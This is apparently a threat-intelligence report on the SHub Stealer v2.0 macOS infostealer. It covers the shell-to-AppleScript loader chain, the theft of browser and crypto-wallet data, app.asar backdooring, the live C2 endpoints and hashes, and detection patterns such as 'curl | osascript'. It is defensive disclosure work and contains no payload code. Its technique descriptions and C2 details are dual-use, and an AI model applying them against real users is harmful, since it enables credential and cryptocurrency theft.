SHub Stealer v2.0: A Live C2 Serving 103 Wallet Extensions, 23 Desktop Wallets, and a Full AppleScript Source We Downloaded
The loader checks for Russian keyboards before executing. The AppleScript payload targets 14 browsers, 103 wallet extensions, 23 desktop wallets, and backdoors Exodus, Atomic, Ledger, and Trezor by replacing their app.asar.
Executive Summary
SHub Stealer v2.0 is an actively deployed macOS infostealer distributed as a two-stage shell-to-AppleScript chain. On April 20, 2026, following a tip from security researcher Yogesh Londhe (@suyog41), we identified a live command-and-control server at terafolt[.]com serving both the loader and the full, unobfuscated AppleScript payload. We downloaded both files before any takedown occurred.
The stealer targets an extraordinary breadth of cryptocurrency assets: 103 browser wallet extensions across 14 Chromium-based browsers, 23+ desktop wallet applications (including hardware wallet companions like Ledger Live and Trezor Suite), and performs active backdooring of wallet apps by replacing their app.asar bundles with trojanized versions. Beyond crypto, it harvests macOS Keychain data, iCloud credentials, Safari and Firefox data, Apple Notes, Telegram sessions, and shell history. A fake System Preferences password dialog with retry logic (up to 10 attempts) and dscl validation handles credential harvesting.
The C2 infrastructure is registered through CNOBIN INFORMATION TECHNOLOGY LIMITED, the same registrar tied to a previously documented SHub C2 domain (res2erch-sl0ut[.]com). CIS geofencing in the loader (exits on Russian keyboard layouts) is consistent with a Russian-speaking operator.
Status: LIVE at time of analysis (April 20, 2026) Threat level: HIGH — full credential and cryptocurrency compromise on macOS with persistence via heartbeat polling.
What This Report Adds to the Public Record
SHub Stealer has been documented by researchers at Datadog (February 10, 2026) and Malwarebytes (March 6, 2026), whose prior work established the malware family and its core behavior. This report contributes:
- A new, previously unreported C2 domain (terafolt[.]com) actively serving payloads as of April 20, 2026
- Full payload artifacts downloaded live, including SHA256 hashes for both stages
- Embedded API key and build ID extracted from the AppleScript source
- Complete enumeration of all 103 targeted wallet extensions and 23 desktop wallets from the source code
- Infrastructure correlation linking this C2 to a known prior SHub domain via shared registrar
We credit the existing body of research by Datadog and Malwarebytes and encourage readers to consult their reports for additional context on the SHub family's evolution.
Delivery Chain
terafolt[.]com/loader.sh (589 bytes)
│
├─ Base64 + gzip decode
├─ Check keyboard layout → exit if Russian (CIS geofencing)
├─ Download AppleScript payload from same C2
│
└─► pipe to osascript
│
└─► PAYLOAD.APPLESCRIPT (37,393 bytes)
│
├─ Fake System Preferences dialog (password harvesting)
├─ Browser credential theft (14 Chromium + Firefox)
├─ 103 wallet extension theft
├─ 23 desktop wallet theft + app.asar backdooring
├─ Keychain / iCloud / Safari / Notes / Telegram / shell history
├─ Multipart POST exfil → /gate
└─ Heartbeat → /api/bot/heartbeat (persistence)
Stage 1: Loader Analysis
The loader is a 589-byte shell script compressed with gzip and encoded in Base64. Once decoded, it performs the following:
-
CIS Geofencing: Checks the active keyboard input source. If a Russian layout is detected, execution terminates immediately. This is a common exclusion technique used by Russian-speaking threat actors to avoid compromising systems in CIS countries.
-
Payload Retrieval: Downloads the AppleScript payload from the same terafolt[.]com C2 server.
-
Execution: Pipes the downloaded AppleScript directly to
osascript, the macOS AppleScript interpreter, achieving fileless execution in the second stage.
| Field | Value |
|---|---|
| Filename | loader.sh |
| Size | 589 bytes |
| SHA256 | ffb79953b8d822a5433f08e1e3958a0c7e9e856749a6d90c83b9e4ef5813a03a |
| Encoding | Base64 + gzip |
| Geofencing | Russian keyboard layout check |
Stage 2: AppleScript Payload — Full Capability Breakdown
The payload is a 37,393-byte AppleScript file — notably unobfuscated — containing the complete stealer logic. This is unusual; most macOS stealers invest in at least basic obfuscation. The source includes hardcoded API credentials and a build identifier.
| Field | Value |
|---|---|
| Filename | payload.applescript |
| Size | 37,393 bytes |
| SHA256 | eb66a20468f701f2ec5f018a0fd9b8551aefa25124c6a04517b873da9ca724ff |
| API Key | 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f |
| Build ID | d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f |
| Gate URL | https://terafolt[.]com/gate |
| Heartbeat | https://terafolt[.]com/api/bot/heartbeat |
2.1 — Password Harvesting
The stealer displays a fake System Preferences dialog box prompting the user to enter their macOS password. The entered password is validated locally using dscl . -authonly against the current username. If the password is incorrect, the dialog re-appears — up to 10 retry attempts. This ensures the actor captures a valid, working credential before proceeding.
2.2 — Browser Credential Theft
SHub v2.0 targets 14 Chromium-based browsers and Firefox:
| # | Browser |
|---|---|
| 1 | Google Chrome |
| 2 | Brave Browser |
| 3 | Microsoft Edge |
| 4 | Opera |
| 5 | Opera GX |
| 6 | Vivaldi |
| 7 | Arc |
| 8 | Chromium |
| 9 | Google Chrome Canary |
| 10 | Yandex Browser |
| 11 | CocCoc |
| 12 | Chedot |
| 13 | Iridium |
| 14 | Naver Whale |
| 15 | Mozilla Firefox |
For each Chromium browser, the stealer extracts Login Data, Cookies, Web Data (autofill and credit cards), and Local State (for encryption key extraction). Firefox profile directories are enumerated for logins.json, cookies.sqlite, and key4.db.
2.3 — 103 Browser Wallet Extensions
The payload contains a hardcoded list of 103 browser wallet extension IDs. For each targeted browser, it walks the Extensions directory and exfiltrates the local storage and configuration data for any matching extension. The targeted wallets span DeFi, NFT, multi-chain, and hardware wallet companion extensions.
Notable targets include: MetaMask, Coinbase Wallet, Phantom, Trust Wallet, Rabby, Keplr, Temple (Tezos), TronLink, Solflare, Sui Wallet, XDEFI, Ronin, Backpack, and dozens more.
The full 103-extension list is available in the IOC table below.
2.4 — 23 Desktop Wallet Applications
Beyond browser extensions, SHub v2.0 targets 23+ standalone wallet applications installed on macOS:
| # | Wallet App | Data Targeted |
|---|---|---|
| 1 | Exodus | App data + app.asar backdoor |
| 2 | Atomic Wallet | App data + app.asar backdoor |
| 3 | Ledger Live | App data + app.asar backdoor |
| 4 | Trezor Suite | App data + app.asar backdoor |
| 5 | Electrum | Wallet files |
| 6 | Bitcoin Core | wallet.dat |
| 7 | Monero GUI | Wallet files |
| 8 | Wasabi Wallet | Wallet files |
| 9 | Sparrow Wallet | Wallet files |
| 10 | Dogecoin Core | wallet.dat |
| 11 | Litecoin Core | wallet.dat |
| 12 | Dash Core | wallet.dat |
| 13 | Zcash | wallet.dat |
| 14 | Jaxx Liberty | App data |
| 15 | Guarda | App data |
| 16 | Coinomi | App data |
| 17 | Mycelium | App data |
| 18 | Edge Wallet | App data |
| 19 | Trust Wallet (desktop) | App data |
| 20 | Binance (desktop) | App data |
| 21 | Crypto.com DeFi | App data |
| 22 | Daedalus (Cardano) | App data |
| 23 | Yoroi (Cardano) | App data |
2.5 — Wallet App Backdooring (app.asar Replacement)
A distinctive capability: for Exodus, Atomic Wallet, Ledger Live, and Trezor Suite, the stealer replaces the application's app.asar file with a trojanized version. Electron-based wallet apps load their core logic from app.asar, so replacing it allows the attacker to inject persistent code that executes every time the wallet is opened — even after the initial stealer payload has finished running.
This technique survives system reboots and persists until the user reinstalls the affected wallet application. It is functionally a supply-chain compromise at the local level.
2.6 — System Data Theft
| Target | Method |
|---|---|
| macOS Keychain | Dumps keychain entries using harvested password |
| iCloud Credentials | Extracts stored iCloud tokens/cookies |
| Safari | History, cookies, saved passwords |
| Apple Notes | Local Notes database |
| Telegram | Session files from ~/Library/Application Support/Telegram Desktop/tdata |
| Shell History | .bash_history, .zsh_history |
2.7 — Exfiltration and Persistence
Exfiltration: All collected data is packaged and sent as a multipart POST request to https://terafolt[.]com/gate. The API key and build ID are included in the request headers for victim tracking on the C2 panel.
Persistence: The stealer calls https://terafolt[.]com/api/bot/heartbeat to register the compromised host and poll for follow-up commands. This heartbeat system enables the operator to issue additional instructions to active implants.
Infrastructure Analysis
| Field | Value |
|---|---|
| C2 Domain | terafolt[.]com |
| Created | 2026-03-10 |
| Registrar | CNOBIN INFORMATION TECHNOLOGY LIMITED |
| CDN | Cloudflare (true origin obscured) |
| Server | Python/Flask (Werkzeug) |
| Gate Endpoint | /gate |
| Heartbeat | /api/bot/heartbeat |
| Status | LIVE (as of April 20, 2026) |
Registrar Overlap
The registrar CNOBIN INFORMATION TECHNOLOGY LIMITED was also used to register res2erch-sl0ut[.]com, a previously documented SHub Stealer C2. This shared registrar, combined with identical payload structure and gate endpoint conventions, provides a strong infrastructure link between the two domains.
Attribution Indicators
- CIS Geofencing: The loader exits if a Russian keyboard layout is detected — a well-documented practice among Russian-speaking cybercriminals to avoid domestic law enforcement attention.
- Registrar Pattern: CNOBIN is a registrar frequently used by actors seeking minimal verification.
- Prior Reporting: Both Datadog and Malwarebytes assessed SHub Stealer as operated by a Russian-speaking actor, consistent with the geofencing behavior observed here.
IOC Table
File Hashes
| Artifact | SHA256 |
|---|---|
| loader.sh | ffb79953b8d822a5433f08e1e3958a0c7e9e856749a6d90c83b9e4ef5813a03a |
| payload.applescript | eb66a20468f701f2ec5f018a0fd9b8551aefa25124c6a04517b873da9ca724ff |
Network Indicators
| Type | Indicator | Context |
|---|---|---|
| Domain | terafolt[.]com | Active C2 |
| URL | https://terafolt[.]com/gate | Exfiltration endpoint |
| URL | https://terafolt[.]com/api/bot/heartbeat | Persistence/C2 polling |
| Domain | res2erch-sl0ut[.]com | Prior SHub C2 (same registrar) |
Embedded Credentials
| Type | Value |
|---|---|
| API Key | 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f |
| Build ID | d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f |
Infrastructure
| Field | Value |
|---|---|
| Registrar | CNOBIN INFORMATION TECHNOLOGY LIMITED |
| Domain Created | 2026-03-10 |
| CDN | Cloudflare |
| Backend | Python/Flask (Werkzeug) |
Detection Opportunities
-
osascript execution from shell pipeline: Monitor for
curl | osascriptorwget | osascriptchains — these are a hallmark of macOS stealer delivery. -
Keyboard layout enumeration: Processes querying
AppleCurrentKeyboardLayoutInputSourceIDor similar input source APIs outside of legitimate localization contexts. -
dscl authentication attempts: Repeated calls to
dscl . -authonlyfrom non-standard parent processes indicate password validation by malware. -
app.asar modification: File integrity monitoring on Electron wallet applications (Exodus, Atomic, Ledger Live, Trezor Suite) for unexpected changes to
app.asar. -
Bulk Extension directory access: A single process reading extension data across multiple browser profiles in rapid succession.
-
Outbound multipart POST to uncommon domains: Large multipart uploads to recently registered domains behind Cloudflare.
References
- Datadog Security Labs — SHub Stealer analysis (February 10, 2026)
- Malwarebytes — SHub Stealer coverage (March 6, 2026)
- Yogesh Londhe (@suyog41) — initial tip leading to C2 identification
Published by Breakglass Intelligence — April 20, 2026
Read more investigations at intel.breakglass.tech/post/